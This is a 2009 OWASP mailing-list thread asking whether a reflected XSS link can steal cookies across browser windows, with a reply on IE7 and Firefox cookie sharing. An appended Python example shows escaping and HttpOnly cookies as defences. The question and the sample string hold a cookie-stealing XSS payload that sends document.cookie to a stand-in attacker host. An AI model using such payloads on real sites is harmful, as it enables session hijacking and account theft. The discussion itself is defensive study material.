Excellent information!

Thanks Karthik!!

On Fri, Mar 20, 2009 at 10:46 AM, Karthik Muthukrishnan <karthik.muthukrish...@tcs.com> wrote:

> Whether cookies are shared between browser windows depends on various
> factors like browser vendor and how the new browser window is launched.
> Due to these inconsistencies it is good for web application security
> professionals to assume that cookies will be shared across browser windows
> and tabs. As you might all know, cookies will not be shared across browsers
> from different vendors.
>
> Examples:
>
> In Win XP SP3 IE7:
> a. Cookies will be shared if the different browser windows belong to the
> same process. During normal use, this happens when one right-clicks a link
> and then chooses new tab or new window.
> b. Cookies will not be shared if the browser windows belong to separate
> processes. During normal use, this happens when the Internet Explorer icon
> (on the desktop or in the Start menu) is double-clicked.
>
> In Win XP SP3 Firefox 3.0.x:
> Firefox maintains only one process, so cookies are shared between all
> windows and tabs.
>
> Karthik
>
> --
> Karthik Muthukrishnan, CISSP ISSAP,
> Information Security Consultant
> Tata Consultancy Services
>
>
>
> From: Parmendra Sharma <s.parmen...@gmail.com>
> Sent by: owasp-delhi-bounce...@lists.owasp.org
> To: owasp-delhi@lists.owasp.org
> Subject: [Owasp-delhi] Regarding XSS Issue
> Date: 19/03/2009 09:29 AM
>
> Dear all,
>
> I have a little problem regarding XSS and here it is....
>
> To perform an XSS attack an attacker steals cookies (in this case) of an
> already logged-in user.
>
> In this scenario:
>
> -> The user is logged in to the "VulnerableRealBank.com" website in one browser.
>
> -> Now this user opens his email account in a different browser (and not in
> a new tab of the above browser) and clicks on the link given
>
> http://VulnerableRealBank.com/index.php?sessionid=12412412&;
> username=<script>document.location='http://attacker
> host.example/cgi-bin/cookiesteal.cgi?'+document.cookie</script>
>
> Now my Questions:
>
> -> Will the script that is reflected back from the vulnerable domain be
> capable of sending to the attacker the cookies that are maintained by the
> first browser?
>
> -> Is the above possible if I say that I am using a browser version
> that does not share cookies for requests to the same domain?
>
> -> Is this problem totally independent of the browser version, and only
> a function of the script that is sending the cookies?
>
> Waiting for your responses :-)
>
>
> --
> Thanks and Regards:
>
> Parmendra Sharma
> Indian Computer Emergency Response Team (CERT-In)
> Ministry of Information Technology
> Government of India
> 6 C.G.O Complex
> Lodhi Road
> New Delhi
>
> _______________________________________________
> Owasp-delhi mailing list
> Owasp-delhi@lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-delhi
>
>



-- 
Gunwant Singh
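The following Python example is added here and is not part of the thread or of either participant's messages. It looks at the question from the application side: whatever the browser does with its cookie jar, a reflected parameter like the `username` in the question can only read the session cookie if the page echoes the parameter unescaped and the cookie is visible to script. The example renders the page both ways and builds a `Set-Cookie` header that marks the session id `HttpOnly`. The function names, the sample parameter value and the session id value are constructed for illustration.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample input: a username parameter carrying markup, of the kind
# the thread discusses. It is used only to show how the two renderers treat it.
SAMPLE_USERNAME = "<script>document.location='http://attacker-host.example/?'+document.cookie</script>"
SAMPLE_SESSION_ID = "12412412"  # constructed value, matches the one in the question


def render_index_vulnerable(username: str) -> str:
    """Echoes the query parameter straight into the HTML (the behaviour the
    question describes). Any markup in the parameter becomes part of the page."""
    return f"<p>Welcome, {username}</p>"


def render_index_hardened(username: str) -> str:
    """Same page, but the parameter is HTML-escaped before it is reflected, so
    '<', '>', '&' and quotes are rendered as text rather than parsed as markup."""
    return f"<p>Welcome, {html.escape(username, quote=True)}</p>"


def session_cookie_header(session_id: str, secure: bool = True) -> str:
    """Builds the Set-Cookie header for the session id. HttpOnly keeps the value
    out of document.cookie, so even script that does run on the origin cannot
    read it; Secure and SameSite=Lax limit where it is transmitted."""
    cookie = SimpleCookie()
    cookie["sessionid"] = session_id
    cookie["sessionid"]["httponly"] = True
    cookie["sessionid"]["secure"] = secure
    cookie["sessionid"]["samesite"] = "Lax"
    cookie["sessionid"]["path"] = "/"
    return cookie.output(header="Set-Cookie:")


def contains_script_tag(markup: str) -> bool:
    """Cheap check used to compare the two renderers: does the output contain
    an actual <script element (not the escaped text '&lt;script')?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_index_vulnerable(SAMPLE_USERNAME))
    print(render_index_hardened(SAMPLE_USERNAME))
    print(session_cookie_header(SAMPLE_SESSION_ID))
```

The escaping answers the first question in the thread (the script only runs if the site reflects it as markup), and the `HttpOnly` attribute answers it independently of Karthik's point about per-process cookie jars: whether or not a given browser shares cookies between windows, a cookie the script cannot read cannot be sent anywhere. Passing the session id in the URL, as the example link in the question does, is a separate weakness that none of this addresses.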